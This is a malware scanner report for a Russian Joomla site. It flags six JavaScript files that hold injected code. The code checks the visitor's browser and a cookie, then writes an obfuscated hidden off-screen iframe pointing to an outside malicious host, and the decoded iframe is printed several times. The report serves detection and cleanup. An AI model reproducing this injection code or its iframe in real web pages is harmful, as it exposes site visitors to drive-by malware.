
Malware Scanner report for web-prodvijenie.ru

Malicious / Suspicious / Total URLs checked
6 / 0 / 14
6 of the 14 scanned URLs contain malicious code. See details below.
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
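0/0/0 (this count does not include the hidden iframe that the flagged scripts write at run time; see the decoded scripts below)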
Deface / Content modification
OK


Scanned pages/files

Request | Server response | Status
http://web-prodvijenie.ru/
200 OK
Content-Length: 27635
Content-Type: text/html
clean
http://web-prodvijenie.ru/media/system/js/mootools-core.js
200 OK
Content-Length: 98437
Content-Type: application/javascript
clean
http://web-prodvijenie.ru/media/system/js/core.js
200 OK
Content-Length: 6859
Content-Type: application/javascript
clean
http://web-prodvijenie.ru/media/system/js/modal.js
200 OK
Content-Length: 11807
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
// Helper at the top of the code the scanner flagged in this file; the same
// lines open every flagged listing in this report.
// Case-insensitive substring search: both arguments are coerced to strings and
// lower-cased, then indexOf is run from f_offset.
// Returns the match index, or false when the needle is absent. A match at
// index 0 returns 0, so only a strict comparison tells "found at the start"
// apart from "not found".
// The local name `leonmain` recurs in each flagged listing here, which makes it
// a convenient search string when checking other files from the same site.
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var leonmain = 0;
if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) {
return leonmain;
}
return false;
}
function control_agent(){
var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','
... 3202 bytes are skipped ...
{src:a,frameBorder:0,width:this.options.size.x,height:this.options.size.y},this.options.iframeOptions));return this.options.iframePreload?(this.asset.addEvent("load",function(){this.applyContent(this.asset.setStyle("display",""))}.bind(this)),this.asset.setStyle("display","none").inject(this.content),
!1):this.asset},string:function(a){return a}});SqueezeBox.handlers.url=SqueezeBox.handlers.ajax;SqueezeBox.parsers.url=SqueezeBox.parsers.ajax;SqueezeBox.parsers.adopt=SqueezeBox.parsers.clone;

Antivirus reports:

Avast
JS:Redirector-BTV [Trj]
Microsoft
Trojan:JS/Iframe.DI
Avira
HTML/Rce.Gen
Sophos
Troj/JSRedir-LH

http://web-prodvijenie.ru//ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.min.js/
500 Internal Server Error
Content-Length: 878
Content-Type: text/html
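clean (the requested URL has the external host ajax.googleapis.com appended as a path on web-prodvijenie.ru, so this verdict covers the site's 500 error page, not the external jQuery file)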
http://web-prodvijenie.ru/test404page.js
404 Not Found
Content-Length: 518
Content-Type: text/html
clean
http://web-prodvijenie.ru/media/k2/assets/js/k2.noconflict.js
200 OK
Content-Length: 2422
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
// Helper at the top of the code the scanner flagged in this file; the same
// lines open every flagged listing in this report.
// Case-insensitive substring search: both arguments are coerced to strings and
// lower-cased, then indexOf is run from f_offset.
// Returns the match index, or false when the needle is absent. A match at
// index 0 returns 0, so only a strict comparison tells "found at the start"
// apart from "not found".
// The local name `leonmain` recurs in each flagged listing here, which makes it
// a convenient search string when checking other files from the same site.
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var leonmain = 0;
if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) {
return leonmain;
}
return false;
}
function control_agent(){
var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','
... 1028 bytes are skipped ...
{
var cookie = getCookie('kegaoeutg18sf'+'fekfsj3asjf');
if (cookie == undefined) {
setCookie('kegaoeutg18sf'+'fekfsj3asjf', true, 172804);
document.write('<'+'if'+'ra'+'m'+'e'+' s'+'r'+'c'+'='+'"http://oil.pesclubamerica.com/hrejerkthfeh19.html" st'+'yle="posi'+'tion:absolute'+';'+'left'+':'+'-'+'1284'+'px'+';'+'top'+':'+'-'+'1284'+'px'+';'+'" height="134" width="134"><'+'/'+'if'+'ram'+'e'+'>');
}
};
})();
// Assigns jQuery's noConflict() result to $K2. This statement sits after the
// close of the flagged wrapper function; it looks like the file's original
// content rather than part of the injection — confirm against a clean copy of
// k2.noconflict.js.
var $K2 = jQuery.noConflict();

Decoded script:


<iframe src="http://oil.pesclubamerica.com/hrejerkthfeh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe>

Antivirus reports:

Avast
JS:Redirector-BTV [Trj]
Microsoft
Trojan:JS/Iframe.DI
Sophos
Troj/JSRedir-LH

http://web-prodvijenie.ru/components/com_k2/js/k2.js
200 OK
Content-Length: 9398
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
// Helper at the top of the code the scanner flagged in this file; the same
// lines open every flagged listing in this report.
// Case-insensitive substring search: both arguments are coerced to strings and
// lower-cased, then indexOf is run from f_offset.
// Returns the match index, or false when the needle is absent. A match at
// index 0 returns 0, so only a strict comparison tells "found at the start"
// apart from "not found".
// The local name `leonmain` recurs in each flagged listing here, which makes it
// a convenient search string when checking other files from the same site.
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var leonmain = 0;
if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) {
return leonmain;
}
return false;
}
function control_agent(){
var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','
... 3393 bytes are skipped ...
nt)
$K2('.k2Scroller').css('width',($K2('.k2Scroller').find('.k2ScrollerElement:first').outerWidth(true))*$K2('.k2Scroller').children('.k2ScrollerElement').length);
});
// Equal block heights for the "default" view
// Runs on window load: finds the tallest .subCategory / .k2EqualHeights block
// and sets every such block to that height.
// NOTE(review): this tail reads as ordinary layout code, not as part of the
// flagged wrapper at the top of the listing — compare with a clean copy of
// k2.js to confirm.
$K2(window).load(function () {
var blocks = $K2('.subCategory, .k2EqualHeights');
var maxHeight = 0;
blocks.each(function(){
// parseInt is called without a radix on the element's CSS height value
maxHeight = Math.max(maxHeight, parseInt($K2(this).css('height')));
});
blocks.css('height', maxHeight);
});

Decoded script:


<iframe src="http://oil.pesclubamerica.com/hrejerkthfeh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe>

Antivirus reports:

Avast
JS:Redirector-BTV [Trj]
Microsoft
Trojan:JS/Iframe.DI
Avira
HTML/Rce.Gen
Sophos
Troj/JSRedir-LH

http://web-prodvijenie.ru/media/system/js/caption.js
200 OK
Content-Length: 2804
Content-Type: application/javascript
clean
http://web-prodvijenie.ru/media/system/js/mootools-more.js
200 OK
Content-Length: 240406
Content-Type: application/javascript
clean
http://web-prodvijenie.ru/templates/ot_corporatetree/scripts/dropdownMenu.js
200 OK
Content-Length: 6613
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
// Helper at the top of the code the scanner flagged in this file; the same
// lines open every flagged listing in this report.
// Case-insensitive substring search: both arguments are coerced to strings and
// lower-cased, then indexOf is run from f_offset.
// Returns the match index, or false when the needle is absent. A match at
// index 0 returns 0, so only a strict comparison tells "found at the start"
// apart from "not found".
// The local name `leonmain` recurs in each flagged listing here, which makes it
// a convenient search string when checking other files from the same site.
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var leonmain = 0;
if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) {
return leonmain;
}
return false;
}
function control_agent(){
var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','
... 3508 bytes are skipped ...
>} else {
sfHover = function()
{
var sfEls = document.getElementById("ot-mainmenu").getElementsByTagName("li");
for (var i = 0; i<sfEls.length; ++i) {
sfEls[i].onmouseover = function() {
this.className += " sfhover";
}
sfEls[i].onmouseout = function() {
this.className = this.className.replace(new RegExp(" sfhover\\b"), "");
}
}
}
if (window.attachEvent) window.attachEvent("onload", sfHover);
}

Decoded script:


function () {
var sfEls = document.getElementById("ot-mainmenu").getElementsByTagName("li");
for (var i = 0; i < sfEls.length; ++i) {
sfEls[i].onmouseover = function () {this.className += " sfhover";};
sfEls[i].onmouseout = function () {this.className = this.className.replace(new RegExp(" sfhover\\b"), "");};
}
}
<iframe src="http://oil.pesclubamerica.com/hrejerkthfeh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe>

Antivirus reports:

Avast
JS:Redirector-BTV [Trj]
Microsoft
Trojan:JS/Iframe.DI
Avira
HTML/Rce.Gen
Sophos
Troj/JSRedir-LH

http://web-prodvijenie.ru/templates/ot_corporatetree/scripts/otscript.js
200 OK
Content-Length: 4862
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
// Helper at the top of the code the scanner flagged in this file; the same
// lines open every flagged listing in this report.
// Case-insensitive substring search: both arguments are coerced to strings and
// lower-cased, then indexOf is run from f_offset.
// Returns the match index, or false when the needle is absent. A match at
// index 0 returns 0, so only a strict comparison tells "found at the start"
// apart from "not found".
// The local name `leonmain` recurs in each flagged listing here, which makes it
// a convenient search string when checking other files from the same site.
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var leonmain = 0;
if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) {
return leonmain;
}
return false;
}
function control_agent(){
var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','
... 1525 bytes are skipped ...
ction equaHeightTopBox()
{
var topboxes = $$('div.ot-topboxes div.otRounded-mid');
var maxHeight = 0;

topboxes.each(function(item, index)
{
var height = parseInt(item.getStyle('height'));

if(height > maxHeight)
{
maxHeight = height;
}
});
topboxes.setStyle('height', maxHeight + 'px');
}




// Calls equaHeightTopBox() once the window 'load' event fires.
// NOTE(review): this reads as the template's own layout code, not as part of
// the flagged wrapper at the top of the listing — compare with a clean copy of
// otscript.js to confirm.
window.addEvent ('load', function() {
equaHeightTopBox();

});

Decoded script:


<iframe src="http://oil.pesclubamerica.com/hrejerkthfeh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe>

Antivirus reports:

Avast
JS:Redirector-BTV [Trj]
Microsoft
Trojan:JS/Iframe.DI
Sophos
Troj/JSRedir-LH

http://web-prodvijenie.ru/modules/mod_ot_scroller/js/jquery.tools.min.js
200 OK
Content-Length: 12310
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
// Helper at the top of the code the scanner flagged in this file; the same
// lines open every flagged listing in this report.
// Case-insensitive substring search: both arguments are coerced to strings and
// lower-cased, then indexOf is run from f_offset.
// Returns the match index, or false when the needle is absent. A match at
// index 0 returns 0, so only a strict comparison tells "found at the start"
// apart from "not found".
// The local name `leonmain` recurs in each flagged listing here, which makes it
// a convenient search string when checking other files from the same site.
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var leonmain = 0;
if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) {
return leonmain;
}
return false;
}
function control_agent(){
var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','
... 3164 bytes are skipped ...
e.delta=e.wheelDelta/120;break}e.type="wheel";return b.event.handle.call(this,e,e.delta)}var a=b.tools.scrollable;a.plugins=a.plugins||{};a.plugins.mousewheel={version:"1.0.1",conf:{api:false,speed:50}};b.fn.mousewheel=function(f){var g=b.extend({},a.plugins.mousewheel.conf),e;if(typeof f=="number"){f={speed:f}}f=b.extend(g,f);this.each(function(){var h=b(this).scrollable();if(h){e=h}h.getRoot().wheel(function(i,j){h.move(j<0?1:-1,f.speed||50);return false})});return f.api?e:this}})(jQuery);

Decoded script:


<iframe src="http://oil.pesclubamerica.com/hrejerkthfeh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe>

Antivirus reports:

Avast
JS:Redirector-BTV [Trj]
Microsoft
Trojan:JS/Iframe.DI
Avira
HTML/Rce.Gen
Sophos
Troj/JSRedir-LH

http://web-prodvijenie.ru//vk.com/js/api/openapi.js?60/
404 Not Found
Content-Length: 528
Content-Type: text/html
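clean (the requested URL has the external host vk.com appended as a path on web-prodvijenie.ru, so this verdict covers the site's 404 page, not the external openapi.js file)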

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: web-prodvijenie.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sat, 04 Oct 2014 15:17:49 GMT
Pragma: no-cache
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 7bad5c47e51dd58e24bbe2681002a0ee=a358e8334c06b69a9a299009c31c9a19; path=/
X-Logged-In: False
X-Powered-By: PHP/5.3.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: web-prodvijenie.ru
Referer: http://www.google.com/search?q=web-prodvijenie.ru

Result:
The result is similar to the first query. No suspicious redirects were found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=web-prodvijenie.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://web-prodvijenie.ru/

Result: web-prodvijenie.ru is not infected or malware details are not published yet.